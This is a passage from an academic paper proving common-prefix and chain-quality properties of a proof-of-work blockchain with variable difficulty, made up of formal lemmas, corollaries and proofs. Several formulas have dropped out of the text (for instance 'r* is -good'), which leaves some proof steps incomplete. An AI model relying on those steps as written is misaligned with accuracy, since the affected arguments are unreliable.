(c)\n\nNo insertions, no copies, and no predictions occurred in E.\n\n### Remark 4\n\nNote that if J indexes the queries of the adversary in a set S of consecutive rounds, then $$|J|=q\\sum _{r\\in S}t_r$$ and the inequality in Definition 8(b) reads $$\\sum _{j\\in J}A_j(E)\\le (1+\\epsilon )p\\sum _{r\\in S}t_r$$.\n\nThe next proposition simplify our applications of Definition 8(a).\n\n### Proposition 3\n\nAssume E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. For any set S of consecutive rounds with $$|S|\\ge \\frac{m}{16\\tau f}$$,\n$$\\sum _{r\\in S}D_r\\le (1+\\epsilon )p\\sum _{r\\in S}n_r .$$\nIf in addition, E is $$(\\eta ,\\theta )$$-good, then\n$$\\sum _{r\\in S}Q_r\\ge (1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r$$\nand any block computed by an honest party at any round r corresponds to target at least $$T^{(r,\\eta )}$$, and so contributes to the random variables $$D_r$$ and $$Q_r$$ (if the r was uniquely successful).\n\n### Proof\n\nWe first partition S into several parts with size at least $$\\frac{m}{16\\tau f}$$ and at most s. In view of Proposition 2, for both of the inequalities, we only need to verify the ‘if’ part of Definition 8(a) for each part $$S'$$ of S. Indeed, by the definition of $$T^{(S',\\eta )}$$ and Fact 1, $$pT^{(S',\\eta )}\\sum _{r\\in S'}n_r\\ge \\eta f|S'|/\\gamma \\ge \\frac{\\eta m}{16\\tau \\gamma }$$. 
The last part, in view of the definition of $$T^{(r,\\eta )}$$, is equivalent to r being $$(\\eta ,\\theta )$$-good.    $$\\square$$\n\nAlmost all polynomially bounded executions (in $$\\kappa$$) are typical:\n\n### Proposition 4\n\nAssuming the ITM system $$(\\mathcal {Z},C)$$ runs for L steps, the event “$$\\mathcal {E}\\hbox { is not typical}$$” is bounded by $$\\exp (- \\varOmega (\\min \\{m,\\kappa \\}) + \\ln L)$$. Specifically, the bound is $$\\exp \\bigl \\{-\\frac{\\eta \\epsilon ^2(1-2\\delta )m}{64\\tau ^3\\gamma }+2(\\ln L +\\ln 2)\\bigr \\}+2^{-\\kappa +1+2\\log L}$$.\n\n### Proof\n\nSee the full version.    $$\\square$$\n\n### Lemma 2\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r}$$ is $$(\\eta ,\\theta )$$-good, then $$\\mathcal {S}_{r+1}$$ contains no chain that has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ consecutive rounds.\n\n### Proof\n\nSuppose—towards a contradiction—$$\\mathcal {C}\\in \\mathcal {S}_{r+1}$$ and has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ rounds. Without loss of generality we may assume that $$r+1$$ is the first such round.\n\nLet $$r^*\\le r$$ denote the greatest timestamp among the blocks of $$\\mathcal {C}$$ computed by honest parties ($$r^*=0$$ if none exists). Define $$S=\\{r^*+1,\\dots ,r\\}$$ with $$|S|\\ge \\frac{m}{16\\tau f}$$ and the index-set of the corresponding set of queries $$J=\\{1,\\dots ,q\\sum _{r\\in S}t_r\\}$$. Suppose that the blocks of $$\\mathcal {C}$$ with timestamps in S span k epochs with corresponding targets $$T_1,\\dots ,T_k$$. For $$i\\in [k]$$ let $$m_i$$ be the number of blocks with target $$T_i$$ and set $$M=m_1+\\cdots +m_k$$.\n\nOur plan is to contradict the assumption that $$\\mathcal {C}\\in \\mathcal {S}_{r+1}$$, by showing that the honest parties have accumulated more difficulty than the adversary. To be precise, note that the blocks $$\\mathcal {C}$$ has gained in S sum to $$\\sum _{i\\in [k]}\\frac{m_i}{T_i}$$ difficulty. On the other hand, by the Chain-Growth Lemma 1, all the honest parties have advanced during the rounds in S by $$\\sum _{r\\in S}D_r(E)\\ge \\sum _{r\\in S}Q_r(E)$$. Since $$|S|\\ge \\frac{m}{16\\tau f}$$, Proposition 3 implies that $$\\sum _{r\\in S}Q_r(E)$$ is at least $$(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r$$. Therefore, to obtain a contradiction, it suffices to show that\n\\begin{aligned} \\sum _{i\\in [k]}\\frac{m_i}{T_i}<(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r. \\end{aligned}\n(1)\nWe proceed by considering cases on M.\nFirst, suppose $$M\\ge 2M'$$, where $$M'=\\frac{\\eta (1-\\epsilon )(1-\\theta f)}{32\\tau ^2\\gamma }\\cdot m$$ (see Definition 8(b)). Partition the part of $$\\mathcal {C}$$ with these M blocks into $$\\ell$$ parts, so that each part has the following properties: (1) it contains at most one target-calculation point, and (2) it contains at least $$M'$$ blocks with the same target. Note that such a partition exists because $$M\\ge 2M'$$ and $$M'<m$$. For $$i\\in [\\ell ]$$, let $$j_i\\in J$$ be the index of the query during which the last block of the i-th part was computed. Set $$J_i=\\{j_{i-1}+1,\\dots ,j_i\\}$$, with $$j_0=0$$. Note that Definition 8(c) implies $$j_{i-1}<j_i$$, and this is a partition of J. Recalling Definition 8(b), the sum of the difficulties of all the blocks in the i-th part is at most $$\\sum _{j\\in J_i}A_j(E)$$. 
This holds because one of the targets is at least $$\\tau T^{(J_i)}$$ (since more than $$M'$$ blocks have been computed in $$J_i$$ with this target) and so both are at least $$\\smash {T^{(J_i)}}$$ (since targets with at most one calculation point between them can differ by a factor at most $$\\tau$$). Thus,\n$$\\sum _{i\\in [k]}\\frac{m_i}{T_i} \\le \\sum _{i\\in [\\ell ]\\atop j\\in J_i}A_j(E) \\le \\sum _{i\\in [\\ell ]}\\frac{1+\\epsilon }{2^\\kappa }|J_i| =(1+\\epsilon )p\\sum _{r\\in S}t_r <(1+\\epsilon )(1-\\delta )p\\sum _{r\\in S}n_r ,$$\nwhere in the last step we used Requirement (R0). Requirement (R1) implies $$(1+\\epsilon )(1-\\delta )\\le (1-\\epsilon )(1-\\theta f)$$); thus, Eq. (1) holds concluding the case $$M\\ge 2M'$$.\nOtherwise, $$k\\le 2$$ and $$m_1+m_2<2M'$$. Let $$S'$$ consist of the first $$\\frac{m}{16\\tau f}$$ rounds of S. We are going to argue that in this case Eq. (1) holds even for $$S'$$ in the place of S. Since we are in a $$(\\gamma ,s)$$-respecting environment, by Fact 1, $$\\gamma \\sum _{r\\in S'}n_r\\ge n_{r^*}|S'|$$. Furthermore, since $$r^*$$ is $$(\\eta ,\\theta )$$-good, $$T_1\\ge T^{(r^*,\\eta )}=\\eta f/pn_{r^*}$$. Recalling also that $$T_2\\ge T_1/\\tau$$, we have $$\\frac{m_1}{T_1}+\\frac{m_2}{T_2}\\le \\frac{m_1+\\tau m_2}{T_1}$$, which in turn is at most\n$$\\frac{\\tau M}{T^{(r^*,\\eta )}} <\\frac{2\\tau M'pn_{r^*}}{\\eta f} \\le \\frac{2\\tau \\gamma M'p\\sum _{r\\in S'}n_r}{\\eta f|S'|} \\le \\frac{32\\tau ^2\\gamma M'p\\sum _{r\\in S}n_r}{\\eta m}$$\nand, after substituting $$M'$$, Eq. (1) holds concluding this case and the proof.    $$\\square$$\n\n### Corollary 1\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then $$E_{r}$$ is $$\\frac{m}{16\\tau f}$$-accurate.\n\n### Proof\n\nSuppose—towards a contradiction—that, for some $$r^*\\le r$$, $$\\mathcal {C}\\in \\mathcal {S}_{r^*}$$ contains a block which is not $$\\frac{m}{16\\tau f}$$-accurate and let $$u\\le r^*\\le r$$ be the timestamp of this block and v its creation time. If $$u-v>\\frac{m}{16\\tau f}$$, then every honest party would consider $$\\mathcal {C}$$ to be invalid during rounds $$v,v+1,\\dots ,u$$. If $$v-u>\\frac{m}{16\\tau f}$$, then in order for $$\\mathcal {C}$$ to be valid it should not contain any honest block with timestamp in $$u,u+1,\\dots ,v$$. (Note that we are using Definition 8(c) here as a block could be inserted later.) In either case, $$\\mathcal {C}\\in \\mathcal {S}_{r^*}$$, but has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ rounds. Since $$E_{r^*-1}$$ is $$(\\eta ,\\theta )$$-good, the statement follows from Lemma 2.    $$\\square$$\n\n### Lemma 3\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and $$r^*$$ an $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good target-recalculation point of a valid chain $$\\mathcal {C}$$. For $$r>r^*+\\frac{\\tau m}{f}$$, assume $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good. Then, either the duration $$\\varDelta$$ of the epoch of $$\\mathcal {C}$$ starting at $$r^*$$ satisfies\n\\begin{aligned} \\frac{m}{\\tau f}\\le \\varDelta \\le \\frac{\\tau m}{f}, \\end{aligned}\nor $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for each $$u\\in \\{r^*+\\frac{\\tau m}{f},\\ldots ,r\\}$$.\n\n### Proof\n\nLet T be the target of the epoch in question.\n\nFor the upper bound, assume $$\\varDelta >\\frac{\\tau m}{f}$$. 
We show first that in the rounds $$S=\\{r^*+\\frac{m}{16\\tau f},\\dots ,r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}\\}$$ the honest parties have acquired more than $$\\frac{m}{T}$$ difficulty. Note that the rounds of S are $$(\\eta ,\\theta )$$-good as they come before r. Thus, by Proposition 3, the difficulty acquired in S by the honest parties is at least\n$$(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)p\\cdot \\frac{|S|n_{r^*}}{\\gamma }\\ge (1-\\epsilon )(1-\\theta f)|S|\\frac{\\eta f}{T} >\\frac{m}{T}.$$\nFor the first inequality, we used Fact 1. For the second, recall that $$r^*$$ is -good and so $$pTn_{r^*}\\ge f(T,n_{r^*})\\ge \\eta \\gamma f$$. For the last inequality observe that and thus follows from Requirement (R3).\n\nNext, we observe that chain $$\\mathcal {C}$$ either has a block within the epoch in question that is computed by an honest party in a round within the period $$[r^*,r^*+\\frac{m}{16\\tau f})$$, or by Lemma 2, $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for each $$u\\in \\{r^*+\\frac{m}{16\\tau f},\\ldots ,r\\}\\supseteq \\{r^*+\\frac{\\tau m}{f},\\ldots ,r\\}$$. Assuming the first happens, it follows that by round $$r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}$$ the honest parties’ chains have advanced by an amount of difficulty which exceeds the total difficulty of the epoch in question. This means that no honest party will extend $$\\mathcal {C}$$ during the rounds $$\\{r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}+1,\\dots ,\\varDelta \\}$$. Since it is assumed $$\\varDelta >r^*+\\frac{\\tau m}{f}$$, Lemma 2 can then be applied to imply that $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for $$u\\in \\{r^*+\\frac{\\tau m}{f},\\dots ,r\\}$$.\n\nFor the lower bound, we assume $$\\varDelta <\\frac{m}{\\tau f}$$ and that $$\\mathcal {C}\\in \\mathcal {S}_u$$ for some $$u\\in \\{r^*+\\varDelta +1,\\dots ,r\\}$$, and seek a contradiction. Clearly, the honest parties contributed only during the set of rounds $$S=\\{r^*,\\dots ,r^*+\\varDelta \\}$$. The adversary, by Lemma 2, may have contributed only during $$S'=\\{r^*-\\frac{m}{16\\tau f},\\dots ,r^*+\\varDelta +\\frac{m}{16\\tau f}\\}$$. Let J be the set of queries available to the adversary during the rounds in $$S'$$. We show that in a typical execution the honest parties together with the adversary cannot acquire difficulty $$\\frac{m}{T}$$ in the rounds in the sets S and $$S'$$ respectively. With respect to the honest parties, Proposition 3 applies. Regarding the adversary, assume first $$T\\ge T^{(J)}$$ (it is not hard to verify that the case $$T<T^{(J)}$$ leads to a more favorable bound). It follows that the total difficulty contributed to the epoch is at most\n$$(1+\\epsilon )p\\biggl (\\sum _{r\\in S}n_r+\\sum _{r\\in S'}t_r\\biggr ) \\le (1+\\epsilon )p\\gamma n_{r^*}(|S|+|S'|) <(1+\\epsilon )p\\gamma n_{r^*}\\cdot \\frac{17m}{8\\tau f} .$$\nThe first inequality follows from Fact 1 using $$t_r<(1-\\delta )n_r$$. For the second substitute the upper bounds on the sizes of S and $$S'$$. Next, note that $$r^*$$ is an -good recalculation point and so . By Proposition 1, . It follows that the last displayed quantity is at most $$\\frac{17(1+\\epsilon )\\theta }{8\\tau (\\gamma -{\\theta f})}\\cdot \\frac{m}{T}$$ and recalling Requirement (R4) this less than $$\\frac{m}{T}$$ as desired.    $$\\square$$\n\n### Proposition 5\n\nAssume E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. 
Consider a round r and a set of consecutive rounds S with $$|S|\\ge \\frac{m}{32\\tau ^2f}$$. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then the adversary, during the rounds in S, has contributed at most $$(1-\\delta )(1+\\epsilon )p\\sum _{r\\in S}n_r$$ difficulty to $$\\mathcal {S}_r$$.\n\n### Proof\n\nWithout loss of generality, we will assume in this proof that $$t_r=(1-\\delta )n_r$$ for each $$r\\in S$$. Furthermore, we assume $$|S|\\le \\frac{\\tau m}{f}$$. If this is not the case, then we can partition S into parts of appropriate sizes and apply the arguments that follow to each sum. The statement will follow upon summing over all parts.\n\nBy Lemma 2, for any block B in $$\\mathcal {S}_r$$, there is a block in the same chain that was computed by an honest party at most $$\\frac{m}{16\\tau f}$$ rounds earlier than it. By Lemma 3, there is at most one recalculation point between them. Let u be the round at which the honest party computed this block and T its target. Note that since E is $$(\\eta ,\\theta )$$-good, $$T\\ge T^{(u,\\eta )}=\\frac{\\eta f}{pn_u}$$ and the target of B is at least $$\\tau ^{-1}T$$. We are going to show that, with J the set of queries that correspond to S, we have $$\\tau ^{-1}T\\ge T^{\\smash {(J)}}$$. This will suffice, because $$(1-\\delta )(1+\\epsilon )p\\sum _{r\\in S}n_r\\ge (1+\\epsilon )p\\sum _{r\\in S}t_r$$, and this is at least $$\\sum _{j\\in J}A_j$$ in a typical execution (Definition 8(b)).\n\nNote first that, using Fact 1 and the lower bound on |S|,\n$$2^{-\\kappa }|J| =(1-\\delta )p\\sum _{r\\in S}n_r \\ge (1-\\delta )p\\frac{|S|n_u}{\\gamma }\\ge (1-\\delta )p\\frac{mn_u}{32\\tau ^3f\\gamma } .$$\nRecalling the definition of $$T^{(J)}$$ and using this bound,\n$$T^{(J)}=\\frac{\\eta (1-\\delta )(1-2\\epsilon )(1-\\theta f)}{32\\tau ^3\\gamma }\\cdot \\frac{m}{|J|}\\cdot 2^\\kappa \\le \\frac{\\eta f(1-2\\epsilon )(1-\\theta f)}{\\tau pn_u} <\\frac{T^{(u,\\eta )}}{\\tau }\\le \\frac{T}{\\tau },$$\nas desired.    $$\\square$$\n\n### Lemma 4\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and assume $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good. If $$\\mathcal {C}\\in \\mathcal {S}_r$$, then $$\\mathcal {C}$$ is $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good in $$E_r$$.\n\n### Proof\n\nNote that it is our assumption that every chain is $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good at the first round. Therefore, to prove the statement, it suffices to show that if a chain is $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good at a recalculation point $$r^*$$, then it will also be $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good at the next recalculation point $$r^*+\\varDelta$$.\n\nLet $$r^*$$ and $$r^*+\\varDelta \\le r$$ be two consecutive target-recalculation points of a chain $$\\mathcal {C}$$ and T the target of the corresponding epoch. By Lemma 3 and Definition 2 of the target-recalculation function, the new target will be\n\\begin{aligned} T'=\\frac{\\varDelta }{m/f}\\cdot T, \\end{aligned}\nwhere $$\\varDelta$$ is the duration of the epoch.\nWe wish to show that\n\\begin{aligned} \\eta \\gamma f\\le f(T',n_{r^*+\\varDelta })\\le {\\theta f}/\\gamma . \\end{aligned}\nTo this end, let $$S=\\{r^*,\\dots ,r^*+\\varDelta \\}$$, $$S'=\\bigl \\{\\max \\{0,r^*-\\frac{m}{16\\tau f}\\},\\dots ,\\min \\{r^*+\\varDelta +\\frac{m}{16\\tau f},r\\}\\bigr \\}$$, and let J index the queries available to the adversary in $$S'$$. Note that, by Corollary 1, every block in the epoch was computed either by an honest party during a round in S or by the adversary during a round in $$S'$$.\nSuppose—towards a contradiction—that $$f(T',n_{r^*+\\varDelta })<\\eta \\gamma f$$.
Using the definition of f(Tn), this implies $${qn_{r^*+\\varDelta }}\\ln \\bigl (1-\\frac{T'}{2^\\kappa }\\bigr )>\\ln (1-\\eta \\gamma f).$$ Applying the inequality $$-\\frac{x}{1-x}<\\ln (1-x)<-x$$, valid for $$x\\in (0,1)$$, substituting the expression for $$T'$$ above and rearranging, we obtain\n\\begin{aligned} \\frac{m}{T}>\\frac{1-\\eta \\gamma f}{\\eta \\gamma }\\cdot p\\varDelta n_{r^*+\\varDelta }. \\end{aligned}\nBy Propositions 3 and 5 it follows that\n$$\\frac{m}{T} \\le 2(1+\\epsilon )p\\sum _{r\\in S'}n_r \\le 2(1+\\epsilon )p\\cdot \\frac{\\varDelta +\\frac{m}{8\\tau f}}{|S'|}\\cdot \\sum _{r\\in S'}n_r.$$\nBy Lemma 3, $$\\varDelta \\ge \\frac{m}{\\tau f}$$. Thus, $$\\frac{\\varDelta +\\frac{m}{8\\tau f}}{\\varDelta }\\le \\frac{9}{8}$$. Using this, Requirement (R5), and combining the inequalities on $$\\frac{m}{T}$$,\n$$\\gamma n_{r^*+\\varDelta } <\\frac{9(1+\\epsilon )\\eta \\gamma ^2}{4(1-\\eta \\gamma f)}\\cdot \\frac{1}{|S'|}\\sum _{r\\in S'}n_r \\le \\frac{1}{|S'|}\\sum _{r\\in S'}n_r,$$\nFor the upper bound, assume , which (see Proposition 1) implies\n\\begin{aligned} \\frac{m}{T}<\\frac{\\gamma }{\\theta }\\cdot p\\varDelta n_{r^*+\\varDelta }. \\end{aligned}\nSet $$S=\\{r^*+\\frac{m}{16\\tau f},\\dots ,r^*+\\varDelta -\\frac{m}{16\\tau f}\\}$$. Since an honest party posses $$\\mathcal {C}$$ at round r, it follows by Lemma 2 that there is a block computed by an honest party in $$\\mathcal {C}$$ during $$\\{r^*,\\dots ,r^*+\\frac{m}{16\\tau f}-1\\}$$ and one during $$\\{r^*+\\varDelta -\\frac{m}{16\\tau f}+1,\\dots ,r^*+\\varDelta \\}$$. By the Chain-Growth Lemma 1, it follows that the honest parties computed less than $$\\frac{m}{T}$$ difficulty during S. In particular,\n$$\\frac{m}{T} >(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)p\\cdot \\frac{\\varDelta -\\frac{m}{8\\tau f}}{|S|}\\cdot \\sum _{r\\in S}n_r .$$\nBy Lemma 3, $$\\varDelta \\ge \\frac{m}{\\tau f}$$. Thus, $$\\frac{\\varDelta -\\frac{m}{8\\tau f}}{\\varDelta }\\ge \\frac{7}{8}$$. Using this, Requirement (R6), and combining the inequalities on $$\\frac{m}{T}$$,\n$$\\frac{n_{r^*+\\varDelta }}{\\gamma }>\\frac{7\\theta }{8\\gamma ^2}(1-\\epsilon )(1-\\theta f)\\cdot \\frac{1}{|S|}\\sum _{r\\in S}n_r \\ge \\frac{1}{|S|}\\sum _{r\\in S}n_r ,$$\ncontradicting Fact 1.   $$\\square$$\n\n### Corollary 2\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and $$E_{r-1}$$ be $$(\\eta ,\\theta )$$-good. If every chain in $$\\mathcal {S}_{r-1}$$ is $$(\\eta \\gamma ,\\smash {\\frac{\\theta }{\\gamma }})$$-good, then $$E_r$$ is $$(\\eta ,\\theta )$$-good.\n\n### Proof\n\nWe use notations and definitions of Lemma 3. Let $$\\mathcal {C}\\mathcal {S}_r$$ and let $$r^*$$ be its last recalculation point in $$E_{r-1}$$. Let T be the target after $$r^*$$ and $$T'$$ the one at r. We need to show that $$f(T',n_r)\\in [\\eta f,\\theta f]$$. Note that if r is a recalculation point, this follows by Lemma 4. Otherwise, $$T'=T$$ and $$\\eta \\gamma \\le f(T,n_{r^*})\\le \\theta f/\\gamma$$. Using Lemma 3, $$r-r^*\\le \\varDelta \\le \\frac{\\tau m}{f}$$. Thus, $$\\frac{1}{\\gamma }n_{r^*}\\le n_r\\le \\gamma n_{r^*}$$. By Fact 2 we have $$f(T,n_r)\\le f(T,\\gamma n_{r^*})\\le \\gamma f(T,n_{r^*})\\le \\theta f$$ and $$f(T,n_r)\\ge f(T,{\\textstyle \\frac{1}{\\gamma }}n_{r^*})\\ge {\\textstyle \\frac{1}{\\gamma }}f(T,n_{r^*})\\ge \\eta f.$$    $$\\square$$\n\n### Corollary 3\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. 
Then every round is $$(\\eta ,\\theta )$$-good in E.\n\n### Proof\n\nFor the sake of contradiction, let r be the smallest round of E that is not $$(\\eta ,\\theta )$$-good. This means that there is a chain $$\\mathcal {C}$$ and an honest party that possesses this chain in round r and the corresponding target T is such that $$f(T,n_r) \\not \\in [\\eta f, \\theta f]$$. Note that $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, and so, by Corollary 1, $$E_{r}$$ is $$\\frac{m}{16\\tau f}$$-accurate. Let $$r^*<r$$ be the last $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good recalculation point of $$\\mathcal {C}$$ (let $$r^*$$ be 0 in case there is no such point).\n\nFirst suppose that there is another recalculation point $$r'\\in (r^*,r]$$. By the definition of $$r^*$$, $$r'$$ is not $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good. However, the assumptions of Lemma 4 hold, implying that $$\\mathcal {C}$$ is $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good. We have reached a contradiction.\n\nWe may now assume that there is no recalculation point in $$(r^*,r]$$ and so the points $$r^*$$ and r correspond to the same target T with $$\\eta \\gamma f\\le f(T,n_{r^*})\\le \\theta f/\\gamma$$. Note that since $$r^*$$ is an $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good recalculation point and $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, we have $$r-r^*\\le \\frac{\\tau m}{f}$$. This follows from Lemma 3, because $$\\mathcal {C}$$ belongs to an honest party at round r. Thus, $$\\frac{1}{\\gamma }n_{r^*}\\le n_r\\le \\gamma n_{r^*}$$, and so (by Fact 2) $$f(T,n_r)\\le f(T,\\gamma n_{r^*})\\le \\gamma f(T,n_{r^*})\\le \\theta f$$ and $$f(T,n_r)\\ge f(T,{\\textstyle \\frac{1}{\\gamma }}n_{r^*})\\ge {\\textstyle \\frac{1}{\\gamma }}f(T,n_{r^*})\\ge \\eta f.$$    $$\\square$$\n\n### Theorem 1\n\nA typical execution in a $$(\\gamma ,s)$$-respecting environment is $$\\frac{m}{16\\tau f}$$-accurate and $$(\\eta ,\\theta )$$-good.\n\n### Proof\n\nThis follows from Corollaries 3 and 1.    $$\\square$$\n\n### Proposition 6\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Any $$\\frac{\\theta \\gamma m}{8\\tau }$$ consecutive blocks in an epoch of a chain $$\\mathcal {C}\\in \\mathcal {S}_r$$ have been computed in at least $$\\frac{m}{16\\tau f}$$ rounds.\n\n### Proof\n\nSuppose—towards a contradiction—that the blocks of $$\\mathcal {C}$$ were computed during the rounds in $$S^*$$, for some $$S^*$$ such that $$|S^*|<\\frac{m}{16\\tau f}$$. Consider an S such that $$S^*\\subseteq S$$ and $$|S|=\\frac{m}{16\\tau f}$$, with the property that a block of target T in $$\\mathcal {C}$$ was computed by an honest party in some round $$v\\in S$$. Such an S exists by Lemmas 2 and 3. By Propositions 3 and 5, the number of blocks of target T computed in S is at most\n$$(1+\\epsilon )(2-\\delta )pT\\sum _{u\\in S}n_u \\le (1+\\epsilon )(2-\\delta )pT\\gamma n_v|S| \\le \\frac{(1+\\epsilon )(2-\\delta )\\gamma |S|\\theta f}{1-\\theta f} \\le \\frac{\\theta \\gamma m}{8\\tau } .$$\nFor the first inequality we used Fact 1, for the second Fact 1 and that round v is $$(\\eta ,\\theta )$$-good, and for the last one Requirement (R2).    $$\\square$$\n\nLet us say that two chains $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ diverge before round r, if the timestamp of the last block on their common prefix is less than r.\n\n### Lemma 5\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment.
Any $$\\mathcal {C},\\mathcal {C}'\\in \\mathcal {S}_r$$ do not diverge before round $$r-\\frac{m}{16\\tau f}$$.\n\n### Proof\n\nConsider the last block on the common prefix of $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ that was computed by an honest party and let $$r^*$$ be the round on which it was computed (set $$r^*=0$$ if no such block exists). Denote by $$\\mathcal {C}^*$$ the common part of $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ up to (and including) this block and let $$d^*=\\mathrm {diff}(\\mathcal {C}^*)$$ and $$S=\\{i:r^*<u<r\\}$$. We claim that\n\\begin{aligned} (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u\\ge \\sum _{u\\in S}Q_u. \\end{aligned}\n(2)\nIn view of Proposition 5, it suffices to show that the difficulty which the adversary contributed to $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ is at least the right-hand side of (2). The proof of this rests on the following observation.\n\nConsider any block B extending a chain $$\\mathcal {C}_1$$ that was computed by an honest party in a uniquely successful round $$u\\in S$$. Consider also an arbitrary $$d\\in \\mathbb {R}$$ such that $$\\mathrm {diff}(\\mathcal {C}_1)\\le d<\\mathrm {diff}(\\mathcal {C}_1B)$$. We are going to argue that if another chain of difficulty at least d exists, then the block that “contains” the point of difficulty d was computed by the adversary. More formally, suppose a chain $$\\mathcal {C}_2B'$$ exists such that $$B'\\ne B$$ and $$\\mathrm {diff}(\\mathcal {C}_2)\\le d<\\mathrm {diff}(\\mathcal {C}_2B')$$. We observe that $$B'$$ was computed by the adversary. This is because no honest party would extend $$\\mathcal {C}_2$$ at a round later than u since $$\\mathrm {diff}(\\mathcal {C}_2)\\le d<\\mathrm {diff}(\\mathcal {C}_1B)$$; on the other hand, if an honest party computed $$B'$$ at some round $$u'<u$$, then no honest party would have extended $$\\mathcal {C}_1$$ at round u since $$\\mathrm {diff}(\\mathcal {C}_1)\\le d<\\mathrm {diff}(\\mathcal {C}_2B')$$; finally, note that u is also ruled out since it was a uniquely successful round by assumption.\n\nReturning to the proof of (2) note that, by the Chain-Growth Lemma 1, $$\\mathrm {diff}(\\mathcal {C}')$$ and $$\\mathrm {diff}(\\mathcal {C})$$ are at least $$d^*+\\sum _{u\\in S}Q_u$$. To show (2) it suffices to argue that for all $$d\\in (d^*,\\sum _{u\\in S}Q_u]$$ there is always a $$B'$$ as above that lies either on $$\\mathcal {C}$$, or on $$\\mathcal {C}'$$, or on their common prefix. But this is always possible since B cannot be both on $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ (note that by the definition of $$r^*$$, B cannot be on their common prefix). To finish the proof note that (2) contradicts Proposition 3 for large enough S.    $$\\square$$\n\n### Theorem 2\n\n(Common Prefix). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. For any round r and any two chains in $$\\mathcal {S}_r$$, the common-prefix property holds for $$k\\ge \\frac{\\theta \\gamma m}{4\\tau }$$.\n\n### Proof\n\nSuppose common prefix fails for two chains $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ at round r. At least k / 2 of the blocks in each chain after their common prefix, lie in a single epoch. Proposition 6 implies that $$\\mathcal {C}$$ and $$\\mathcal {C}'$$ diverge before round $$r-\\frac{m}{16\\tau f}$$, contradicting Lemma 5.    $$\\square$$\n\n### Theorem 3\n\n(Chain Quality). Suppose E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. 
For the chain of any honest party at any round in E, the chain-quality property holds with parameters $$\\ell =\\frac{m}{16\\tau f}$$ and , where $$\\lambda =\\max \\{t_r/n_r\\}<(1-\\delta )$$.\n\n### Proof\n\nLet us denote by $$B_i$$ the i-th block of $$\\mathcal {C}$$ so that $$\\mathcal {C}=B_1 \\dots B_{\\mathop {\\mathrm {len}}(\\mathcal {C})}$$ and consider L consecutive blocks $$B_u,\\dots ,B_v$$. Define $$L'$$ as the least number of consecutive blocks $$B_{u'},\\dots ,B_{v'}$$ that include the L given ones (i.e., $$u'\\le u$$ and $$v\\le v'$$) and have the properties (1) that the block $$B_{u'}$$ was computed by an honest party or is $$B_1$$ in case such block does not exist, and (2) that there exists a round at which an honest party was trying to extend the chain ending at block $$B_{v'}$$. Observe that number $$L'$$ is well defined since $$B_{\\mathop {\\mathrm {len}}(\\mathcal {C})}$$ is at the head of a chain that an honest party is trying to extend. Denote by $$d'$$ the total difficulty of these $$L'$$ blocks. Define also $$r_1$$ as the round that $$B_{u'}$$ was created (set $$r_1=0$$ if $$B_{u'}$$ is the genesis block), $$r_2$$ as the first round that an honest party attempts to extend $$B_{v'}$$, and let $$S=\\{r:r_1\\le r\\le r_2\\}$$. Note that $$|S|\\ge \\frac{m}{16\\tau f}$$.\n\nNow let x denote the total difficulty of all the blocks from honest parties that are included in the L blocks and—towards a contradiction—assume that\n\\begin{aligned} x<\\Bigl [1-\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\Bigr ]d \\le \\Bigl [1-\\Bigl (1+\\frac{\\delta }{2}\\Bigr )\\lambda \\Bigr ]d' .\\end{aligned}\n(3)\nSuppose first that all the $$L'$$ blocks $$\\{B_j:u'\\le j\\le v'\\}$$ have been computed during the rounds in the set S. Recalling Proposition 5, we now argue the following sequence of inequalities.\n\\begin{aligned} (1+\\epsilon )(1-\\delta )p\\sum _{u\\in S}n_u\\ge d'-x \\ge \\Bigl 